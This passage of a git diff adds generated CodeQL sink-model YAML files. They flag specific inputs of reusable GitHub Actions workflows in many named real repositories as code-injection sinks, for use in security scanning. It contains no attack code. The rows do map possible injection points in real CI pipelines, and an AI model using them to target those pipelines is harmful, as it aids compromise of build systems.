000000000000..2e1835cadcad --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gitpod-io/gitpod/.github/workflows/jetbrains-auto-update-template.yml", "*", "inputs.productId", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml new file mode 100644 index 000000000000..924f5eb157c9 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gittools/gitversion/.github/workflows/_artifacts_linux.yml", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml new file mode 100644 index 000000000000..1244f76cbf1f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["googlecloudplatform/magic-modules/.github/workflows/build-downstream.yml", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml new file mode 100644 index 000000000000..94c6c81d33ec --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "inputs.path", "code-injection", "generated"] + - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml new file mode 100644 index 000000000000..c5f5fc4b29d7 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gravitational/teleport/.github/workflows/update-ami-ids.yaml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml new file mode 100644 index 000000000000..506dd2b9fee2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gravitl/netmaker/.github/workflows/publish-docker.yml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml new file mode 100644 index 000000000000..4a81c585259a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "inputs.build-version", "code-injection", "generated"] + - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "inputs.wave-app-name", "code-injection", "generated"] + - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "inputs.working-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml new file mode 100644 index 000000000000..d62c86e1129e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "inputs.dry-run", "code-injection", "generated"] + - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml new file mode 100644 index 000000000000..8aedf9000a06 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/boundary/.github/workflows/test-cli-ui_oss.yml", "*", "inputs.artifact-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml new file mode 100644 index 000000000000..b14f14538b81 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "inputs.package-names-command", "code-injection", "generated"] + - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "inputs.go-test-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml new file mode 100644 index 000000000000..3129cac8979c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/terraform-cdk/.github/workflows/unit.yml", "*", "inputs.package", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.gitUser", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.gitEmail", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.providerFqn", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.parallelConversionsPerDocument", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.parallelFileConversions", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.languages", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.cdktfRegistryDocsVersion", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.files", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.maxRunners", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml new file mode 100644 index 000000000000..a23f69909c7e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/terraform-provider-tfe/.github/workflows/jira-issue-sync.yml", "*", "inputs.issue-extra-fields", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml new file mode 100644 index 000000000000..cd91f58c7ec7 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.product-version", "code-injection", "generated"] + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.package-name", "code-injection", "generated"] + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.goarch", "code-injection", "generated"] + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.goos", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml new file mode 100644 index 000000000000..f9b7785cab96 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.sample-max", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.sample-name", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.vault-edition", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.vault-version", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.name", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.path", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.name", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.go-arch", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.binary-tests", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.total-runners", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "inputs.storage_backend", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml new file mode 100644 index 000000000000..ad0943c30408 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["heroku/cli/.github/workflows/publish-npm.yml", "*", "inputs.isStableRelease", "code-injection", "generated"] + - ["heroku/cli/.github/workflows/promote.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml new file mode 100644 index 000000000000..e263590260ff --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "inputs.project_name", "code-injection", "generated"] + - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "inputs.dependency_track_url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml new file mode 100644 index 000000000000..00b45b50f887 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["home-assistant/operating-system/.github/workflows/test.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["home-assistant/operating-system/.github/workflows/artifacts-index.yaml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml new file mode 100644 index 000000000000..a5f35f3b7379 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.windowsBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.bazelBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.iosBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.macosBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.androidBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.linuxBuildArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml new file mode 100644 index 000000000000..d05595196275 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "inputs.package_name", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "inputs.repo_owner", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "inputs.hub_base_path", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.pr_number", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.commit_sha", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.languages", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.version_tag_suffix", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.additional_args", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.repo_owner", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml new file mode 100644 index 000000000000..ec7b51abd8e3 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "inputs.folder_slices", "code-injection", "generated"] + - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "inputs.setup_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml new file mode 100644 index 000000000000..92fd43bda752 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] + - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "inputs.qt_version", "code-injection", "generated"] + - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "inputs.event_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml new file mode 100644 index 000000000000..ca550e4ddd76 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ibm/sarama/.github/workflows/fvt.yml", "*", "inputs.kafka-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml new file mode 100644 index 000000000000..580ac8bef0b5 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["icloud-photos-downloader/icloud_photos_downloader/.github/workflows/build-package.yml", "*", "inputs.icloudpd_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml new file mode 100644 index 000000000000..463536e9693d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["immich-app/immich/.github/workflows/build-mobile.yml", "*", "inputs.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml new file mode 100644 index 000000000000..57bf30dc0cc1 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["inria/spoon/.github/workflows/jreleaser.yml", "*", "inputs.release-script-to-run", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml new file mode 100644 index 000000000000..b7e49d46e1c0 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["intel/intel-device-plugins-for-kubernetes/.github/workflows/lib-publish.yaml", "*", "inputs.image_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml new file mode 100644 index 000000000000..89257a02fcd2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["inverse-inc/packetfence/.github/workflows/reusable_upload_packages.yml", "*", "inputs._PACKAGE_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml new file mode 100644 index 000000000000..a645511766be --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ispc/ispc/.github/workflows/reusable.rebuild.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml new file mode 100644 index 000000000000..1a7784c9f018 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jetbrains/intellij-platform-gradle-plugin/.github/workflows/reusable-single-unitTest.yml", "*", "inputs.gradleVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml new file mode 100644 index 000000000000..ffb7a7d7d107 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "inputs.image", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "inputs.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "inputs.platform", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-merge-tags.yml", "*", "inputs.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-merge-tags.yml", "*", "inputs.image", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "inputs.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "inputs.image", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml new file mode 100644 index 000000000000..4ae93a83cd8f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml @@ -0,0 +1,23 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kairos-io/kairos/.github/workflows/reusable-zfs-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "inputs.family", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-reset-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.base_image", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.family", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.model", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.variant", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-bundles-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-acceptance-test.yaml", "*", "inputs.port", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-acceptance-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-provider-upgrade-latest-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-provider-upgrade-latest-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml new file mode 100644 index 000000000000..a63ddd5da671 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kanidm/kanidm/.github/workflows/kanidm_individual_book.yml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml new file mode 100644 index 000000000000..e73d0d81875b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml @@ -0,0 +1,20 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kata-containers/kata-containers/.github/workflows/release-s390x.yaml", "*", "inputs.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/release-ppc64le.yaml", "*", "inputs.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/release-arm64.yaml", "*", "inputs.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/release-amd64.yaml", "*", "inputs.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "inputs.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "inputs.repo", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "inputs.registry", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "inputs.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "inputs.repo", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "inputs.registry", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "inputs.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "inputs.repo", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "inputs.registry", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-amd64.yaml", "*", "inputs.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-amd64.yaml", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml new file mode 100644 index 000000000000..3a9119898744 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.build_mode", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.release_branch", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.images_tag", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.quay_org", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend.yml", "*", "inputs.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend-tempo.yml", "*", "inputs.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend-multicluster-primary-remote.yml", "*", "inputs.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend-multicluster-multi-primary.yml", "*", "inputs.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-backend.yml", "*", "inputs.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-backend-multicluster-external-controlplane.yml", "*", "inputs.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/build-frontend.yml", "*", "inputs.target_branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml new file mode 